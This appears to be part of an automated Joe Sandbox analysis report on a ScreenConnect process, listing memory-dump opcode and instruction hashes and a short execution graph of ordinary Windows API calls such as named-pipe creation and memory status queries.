                                                                                    • Instruction ID: fea14a324134371ea8fd6df4ac599ec9aec3c2bafec35e2fdebfc5daba7176e5
                                                                                    • Opcode Fuzzy Hash: b25e57edbd3c09a9cf5dc1add27778e21ebad5a3648b8ab1bd2dee3d5d08c12c
                                                                                    • Instruction Fuzzy Hash: C151C572B0DA894FEB98DF688461AA577D2FF68310F0501ADD49DC72A6DE21F841C740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5d81f340890e60923d4a784636ec68484991c5812ee7025fe870a665a5c02b2b
                                                                                    • Instruction ID: d5c3011ab0e231fb1e3e9fabb9a4b03c7a565702d1d8fa4159a0b1723cf0a572
                                                                                    • Opcode Fuzzy Hash: 5d81f340890e60923d4a784636ec68484991c5812ee7025fe870a665a5c02b2b
                                                                                    • Instruction Fuzzy Hash: BB513B53D0F7CA5FE761ABB884758A47FA0FF12A14B1A02BBC0C84B0B3DA197955C361
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2cc2905067d24817dd3a8ce3cfc3e77e45fe602412ce6f590c9d00c568e917f3
                                                                                    • Instruction ID: 29778c8f1fc7636e4f6c6469dafb2482677262eabfa19a078a56cd8352958d01
                                                                                    • Opcode Fuzzy Hash: 2cc2905067d24817dd3a8ce3cfc3e77e45fe602412ce6f590c9d00c568e917f3
                                                                                    • Instruction Fuzzy Hash: 6241F732B0EF4D4BEB65DAA998610AD77D1EFA4354F05027AD08DC31B3DE266902C381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4842659c969da114b17146e25d6b5358edbbd695fa0e051e7bfacd4c3622cd9c
                                                                                    • Instruction ID: dd2b9e0a1b69c780693c60405be7766836177f82af7c153fe79a1dbaa3fd3207
                                                                                    • Opcode Fuzzy Hash: 4842659c969da114b17146e25d6b5358edbbd695fa0e051e7bfacd4c3622cd9c
                                                                                    • Instruction Fuzzy Hash: AE41C263A0F3D65FFB229A6C98B64D53F60EF1262470A42F7C0C54B0B3D914754A83A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c4df3860cda40059e4d2ceba6a8291c7b8fdda648ed8eed0d0eaec05ac7b8310
                                                                                    • Instruction ID: 5d0569d60d29b0832c8978e8d5cab54a38c361909bcd51ca04a260d989247ff3
                                                                                    • Opcode Fuzzy Hash: c4df3860cda40059e4d2ceba6a8291c7b8fdda648ed8eed0d0eaec05ac7b8310
                                                                                    • Instruction Fuzzy Hash: F341C122A0F7D65FFB12AB7C98B64D43F60AF1262470A43F7C0C98B0B3DA15755A8761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 50b92ccb54ae010501187b27a70efc919e17c97fff5bfa3207b0828fcd3c6ea4
                                                                                    • Instruction ID: 733efc3253349444e4d063626812412ed2b295a4c7cc2669dbe169c4ccbf68f0
                                                                                    • Opcode Fuzzy Hash: 50b92ccb54ae010501187b27a70efc919e17c97fff5bfa3207b0828fcd3c6ea4
                                                                                    • Instruction Fuzzy Hash: 1B21A222A0F7CE1FE7BA86685C695703BA0EF5725070E42F7D488CB0B3D9186D46C361
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e06d75c989359865cf57c48348c3bd2aa6bd41119b8f46d8e5c10e9add40eb9
                                                                                    • Instruction ID: f935b1cb47d37219155faac6e8cb81dbdfd4410bb6a8ca5183b722c528c91739
                                                                                    • Opcode Fuzzy Hash: 1e06d75c989359865cf57c48348c3bd2aa6bd41119b8f46d8e5c10e9add40eb9
                                                                                    • Instruction Fuzzy Hash: 0531F762B0EA8D0FE7E4DA6D689D1707BD1EFA925170941FBE48DC7272E9119C41C341
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb84b28c4a887570343b21016245a0c71f500c3efe39e14bd9ce5944c7d6294d
                                                                                    • Instruction ID: f20d840b8ff2e2b087a46c1ad9e71af4697d9a4bb08b67b89671c4403b97fa4a
                                                                                    • Opcode Fuzzy Hash: bb84b28c4a887570343b21016245a0c71f500c3efe39e14bd9ce5944c7d6294d
                                                                                    • Instruction Fuzzy Hash: 4B41B163A0F7D65FFB229B6C98B64E43FA0EF1262470A42F7C0C94B0B3D91475568761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fec299ae9caa9936c7a9610da0619a296d6fd89db4fea66d4707bd164878bee1
                                                                                    • Instruction ID: ec7532e3278a61422175cb065b4611b4bea4480f469aefe1545dca996e8c1bd7
                                                                                    • Opcode Fuzzy Hash: fec299ae9caa9936c7a9610da0619a296d6fd89db4fea66d4707bd164878bee1
                                                                                    • Instruction Fuzzy Hash: 6B31D422D0F35A6FD711BBB8D4A18E47B60FF02B1871902B2D0D88B0B3DE1575968791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ff21d963aa35620bcd4d5bb9dcfe4f6ce591d551a78ce405dfea952c7606529
                                                                                    • Instruction ID: e3b2d92081282c94253d3c2e71c5a4c77c838c88472cbc92dba8ac931f954322
                                                                                    • Opcode Fuzzy Hash: 6ff21d963aa35620bcd4d5bb9dcfe4f6ce591d551a78ce405dfea952c7606529
                                                                                    • Instruction Fuzzy Hash: D921F523F1FE9A0BF7B6966C146417066C2DB9575070E03BEDE8CC72FAEC05A9065240
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3bc4f73e363dda8a869de1777813648aca7ba5249bdf0553a7da1c2c90fa3cf9
                                                                                    • Instruction ID: 88285f5420296b1f02902c25ed4d0746e49427ec37e3b5238e71fc4bd7ffdbcb
                                                                                    • Opcode Fuzzy Hash: 3bc4f73e363dda8a869de1777813648aca7ba5249bdf0553a7da1c2c90fa3cf9
                                                                                    • Instruction Fuzzy Hash: 0931913154E3C95FD317AB68D8659D57FB0EF4722470A02E7E089CB0B3CA1D594AC7A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f31a15e20db7f1c2421637bd0a01634e23f9fa8ddf791ffe9182cade8dc5501b
                                                                                    • Instruction ID: 58ef870bead2e941e645882ac51c8438639de1221aba227166845c80bb245c81
                                                                                    • Opcode Fuzzy Hash: f31a15e20db7f1c2421637bd0a01634e23f9fa8ddf791ffe9182cade8dc5501b
                                                                                    • Instruction Fuzzy Hash: A211A737F2EE4D4AEBA8D6A96C302FD36D1EF44354F0501BAE45DD32B2DE1699108245
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23cf13ae9a1ba760afcace8b7d2ea8ba5327acb557326f42c3d8bc8588eb8ca5
                                                                                    • Instruction ID: 050a51ebab0c600e90842a64abbc59806806e15b28bf83b624d18bd1e6f300e2
                                                                                    • Opcode Fuzzy Hash: 23cf13ae9a1ba760afcace8b7d2ea8ba5327acb557326f42c3d8bc8588eb8ca5
                                                                                    • Instruction Fuzzy Hash: 3211A2B6E0EB8C4BDFA5DBA44C751A83FE1FF55300F0601AAE058D31B2DA25A504C701
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4b917b739486f79e3d15c5509f4a8fefb4fbf5435a144a70e9885efea718d786
                                                                                    • Instruction ID: 13c07e064a8c93ca9388f7e559b9126144d6677c29d0619b91e9701d55d47342
                                                                                    • Opcode Fuzzy Hash: 4b917b739486f79e3d15c5509f4a8fefb4fbf5435a144a70e9885efea718d786
                                                                                    • Instruction Fuzzy Hash: 26118171B09A494FEB98EF688060B6577A1FF68300B1541E8D48DDB2A7DE25F945C780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f10b4dfe80a6e34cf240387a81f199bc5a628f6d3ae72ee9bb5b1ae9c8625da
                                                                                    • Instruction ID: c8bb78141609451ab834093f65f0e66861ae9bae5473b2dfd1e3642fb1260512
                                                                                    • Opcode Fuzzy Hash: 5f10b4dfe80a6e34cf240387a81f199bc5a628f6d3ae72ee9bb5b1ae9c8625da
                                                                                    • Instruction Fuzzy Hash: BA118E71B09A494FEB98EF688060B6177A1FF68300B1541E8D48DDB2A7DA25E945C780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b191588b8b2457a2a056b6455f475ddd1a11998340211cca6b67a4f4d961160d
                                                                                    • Instruction ID: 47801e03b9d919c023ce3cd2fb37ec7e85092483ca88fc60a3ccdce425ff6176
                                                                                    • Opcode Fuzzy Hash: b191588b8b2457a2a056b6455f475ddd1a11998340211cca6b67a4f4d961160d
                                                                                    • Instruction Fuzzy Hash: CE11C115F0E74B0BEB799268447437536E1DF55300F0A41BFC05AC62FADC6C9D818301
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 142409c9abb348fc173db579eb1a2df5da93dee2847c759b83b9f6fc83aa9713
                                                                                    • Instruction ID: 44b861c8cddc699b693021417a365bf9e175196db0030126ccab048b85f1fc67
                                                                                    • Opcode Fuzzy Hash: 142409c9abb348fc173db579eb1a2df5da93dee2847c759b83b9f6fc83aa9713
                                                                                    • Instruction Fuzzy Hash: 0B012432F0FB4D4AEF69DA98A8710EC7751EFA1340F061276E04C821B3DE162A068290
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5d3bf7b4adf91a164a1b6c115e79ec3f548c40c88eec7ce8e7c73f2f963accf1
                                                                                    • Instruction ID: b4f79c2dcf27b0ddb67c95c3e053c4a8367ae4b2f6a629ba58c83aac1e03e62e
                                                                                    • Opcode Fuzzy Hash: 5d3bf7b4adf91a164a1b6c115e79ec3f548c40c88eec7ce8e7c73f2f963accf1
                                                                                    • Instruction Fuzzy Hash: 4501FF2160EBCD0FD39ACA6CACA80613FE0EB5B22130901EBE488CB273E8018C41C351
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 93e31b3228eedaa5c5290755fc62cceff9445057d7fb0bf3ece24f27d43bd520
                                                                                    • Instruction ID: 0b3b1576afb72b3ecc94c9ce51267a64210a8c1b2a53ad51dbbcbfac02deaa99
                                                                                    • Opcode Fuzzy Hash: 93e31b3228eedaa5c5290755fc62cceff9445057d7fb0bf3ece24f27d43bd520
                                                                                    • Instruction Fuzzy Hash: 1BF08C2180F3960FD36297B48865AA1BFF0AF47110B0E42EAD088CB5B3D90C59CA87A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48570bc20d5ffe290211bd4bf578f2c53a46a7a3b02a1fe59d528e2ce3a2fe51
                                                                                    • Instruction ID: d10f7fea2678bc0fc10947eebb86a4bceb224f2550de107f7ae3e0e28cdab1da
                                                                                    • Opcode Fuzzy Hash: 48570bc20d5ffe290211bd4bf578f2c53a46a7a3b02a1fe59d528e2ce3a2fe51
                                                                                    • Instruction Fuzzy Hash: B1F0303540D79C9FCB42EB64D4618D57BB0FF16320B0601C7E049CB062D6219A5ACB82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e7d3227b1c49a7cda285bfe17cbe7b0d30117b40b703c1b406cbeb6f2da81a1b
                                                                                    • Instruction ID: c76eb7a288bb1013e95cc8f727349ff5505abd4e9ad1d8036d0e75e67a7bd583
                                                                                    • Opcode Fuzzy Hash: e7d3227b1c49a7cda285bfe17cbe7b0d30117b40b703c1b406cbeb6f2da81a1b
                                                                                    • Instruction Fuzzy Hash: A3E0D811A0F7C44FEB25A6799879CA43F50AF1621070942FED48A8B1F3E8059A84C711
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dba04c4f12834f479dbdbf5e729332581029c216540717c964744d6278a0e716
                                                                                    • Instruction ID: 7e377166beb2aeeafe467ecd6b4e06d1467f03e2e006311de9f9425557cda399
                                                                                    • Opcode Fuzzy Hash: dba04c4f12834f479dbdbf5e729332581029c216540717c964744d6278a0e716
                                                                                    • Instruction Fuzzy Hash: 49E08C15F5E70B02FB7C26A569A17B970D08F04304F4A417E952E801EACCAC9E808552
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 07f573711ca0563017fef6dcb8503b746daed36e624ff9afe51ce6372677206e
                                                                                    • Instruction ID: ea199ed227e2439a1ba7b9eb26175153fccc1fc73648d13a718241dbea130978
                                                                                    • Opcode Fuzzy Hash: 07f573711ca0563017fef6dcb8503b746daed36e624ff9afe51ce6372677206e
                                                                                    • Instruction Fuzzy Hash: B8C09B14F1A64E46F165EBA844711BD21527FD8204B535535D00D851B7CD3CE7016545
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9850ef57064c8fe78f6cfefc3046e13c8c245d02145dcb0c9604ed0bc3126787
                                                                                    • Instruction ID: cb6a230d286bc388d739f9387b229a2e5989ac3fcc8c8f7e40e30080c60b757f
                                                                                    • Opcode Fuzzy Hash: 9850ef57064c8fe78f6cfefc3046e13c8c245d02145dcb0c9604ed0bc3126787
                                                                                    • Instruction Fuzzy Hash: 56A00200F0FA1E45E07165D8042117D50411FA5604A235275D00D951B7CE6CEB426596
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 3L_^
                                                                                    • API String ID: 0-195740063
                                                                                    • Opcode ID: 88ab10a6a6ea472ac3f1832d1f047f7d0b493a66dda80869d0a0460a99bbaf22
                                                                                    • Instruction ID: af8fd80058508dd98ca0bb098f5ade5c5b4946a360b55e5e033c194e89ce83ed
                                                                                    • Opcode Fuzzy Hash: 88ab10a6a6ea472ac3f1832d1f047f7d0b493a66dda80869d0a0460a99bbaf22
                                                                                    • Instruction Fuzzy Hash: 9F91F213B1A16646D7067BFD74624F97F61EF42379B0842B7D19D8A0EB8D4820CA82D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a85249ccd89e5e9150a5387f0aa6bbd6b34f8e3818ca69f6f3b9f90691721961
                                                                                    • Instruction ID: 75d2a444c958315868600acdc248bf8a4dcc34a88bc99eb0818d834949963a8a
                                                                                    • Opcode Fuzzy Hash: a85249ccd89e5e9150a5387f0aa6bbd6b34f8e3818ca69f6f3b9f90691721961
                                                                                    • Instruction Fuzzy Hash: 9DB11631F19A0E4FDB68EBA884656A577E2FFA8300F15837AD44DD32A6DE34E941C740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b00b1e1a25c83a42286db2b04fb553a9981eac038e54adc552bd9ea7729b3d19
                                                                                    • Instruction ID: 885ed75fb5a7ec83266d69c8e2c17abd86f29e1ae04598a08b4c75c97cb592c2
                                                                                    • Opcode Fuzzy Hash: b00b1e1a25c83a42286db2b04fb553a9981eac038e54adc552bd9ea7729b3d19
                                                                                    • Instruction Fuzzy Hash: 2751E217B1E5A246DB027BFC74625F9BF20EF42375B0946B7C2C99F097880460CA83D2

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.5%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:14
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 15467 7ffd9b3f8014 15468 7ffd9b3f801d 15467->15468 15469 7ffd9b3f8082 15468->15469 15470 7ffd9b3f80f6 SetProcessMitigationPolicy 15468->15470 15471 7ffd9b3f8152 15470->15471 15455 7ffd9b3f3662 15456 7ffd9b4161e0 ConnectNamedPipe 15455->15456 15458 7ffd9b416292 15456->15458 15463 7ffd9b3f3642 15464 7ffd9b416040 CreateNamedPipeW 15463->15464 15466 7ffd9b416173 15464->15466 15459 7ffd9b70906c 15460 7ffd9b70906f GlobalMemoryStatusEx 15459->15460 15462 7ffd9b709145 15460->15462

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.1816656648.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: MitigationPolicyProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1088084561-0
                                                                                    • Opcode ID: f1397ee9f7c5f71c2eaddaa5d05e141cfc011d1009ce24ef9804631e168d42e3
                                                                                    • Instruction ID: f01c940506a4ad31b0726089f88132c20d30fc7bc30709db2be783245fc57021
                                                                                    • Opcode Fuzzy Hash: f1397ee9f7c5f71c2eaddaa5d05e141cfc011d1009ce24ef9804631e168d42e3
                                                                                    • Instruction Fuzzy Hash: 19512B31E1DB494FEB28EFA8984A5E97BE0EF55310F04027FE059C3192DF78A9468791

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 143 7ffd9b3f3642-7ffd9b4160aa 146 7ffd9b4160b4-7ffd9b416171 CreateNamedPipeW 143->146 147 7ffd9b4160ac-7ffd9b4160b1 143->147 149 7ffd9b416173 146->149 150 7ffd9b416179-7ffd9b4161ac 146->150 147->146 149->150
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.1816656648.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2489174969-0
                                                                                    • Opcode ID: 809e28a191466d12c00320d88b788aa452f7abb9e4512f8c19d4a9904cd3105e
                                                                                    • Instruction ID: 47c86c1e0a27cb2eb52cde57362a8587562e89806dab567f6b6caab4f83bc0d1
                                                                                    • Opcode Fuzzy Hash: 809e28a191466d12c00320d88b788aa452f7abb9e4512f8c19d4a9904cd3105e
                                                                                    • Instruction Fuzzy Hash: A5519071A1CA1C8FDB68EF5C9805BE9BBE0FB59720F0042AEE44DD3251CB70A9458BC1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 214 7ffd9b70906c-7ffd9b7090b9 220 7ffd9b709133-7ffd9b709143 GlobalMemoryStatusEx 214->220 221 7ffd9b7090bb-7ffd9b709132 214->221 223 7ffd9b709145 220->223 224 7ffd9b70914b-7ffd9b709172 220->224 221->220 223->224
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.1823407459.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b700000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    • Opcode ID: cdeb44f1c0adfab47a199ed49a616db595c54440d6b748f11c3545f2a95cb60a
                                                                                    • Instruction ID: f10e9176e1ce9e7aa8dc02d1cce843ef7bc4b066eee254adbf5d0a9b2e7ed6d7
                                                                                    • Opcode Fuzzy Hash: cdeb44f1c0adfab47a199ed49a616db595c54440d6b748f11c3545f2a95cb60a
                                                                                    • Instruction Fuzzy Hash: 2C312432A0DA4D8FDB18DB6C98596F97BE0FF56320F04427BC08DD71A2DB606846CB81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 226 7ffd9b3f3662-7ffd9b416290 ConnectNamedPipe 230 7ffd9b416292 226->230 231 7ffd9b416298-7ffd9b4162e0 call 7ffd9b4162e1 226->231 230->231
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.1816656648.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2191148154-0
                                                                                    • Opcode ID: 9ca5776cdd36d1e609da6129967c792fa8d3b953376abf9f13b4f0c6909d7faa
                                                                                    • Instruction ID: f9edf232d5188703d7e9775e9e0d34c0632db0cfe475e3b614659ea4a01af4d9
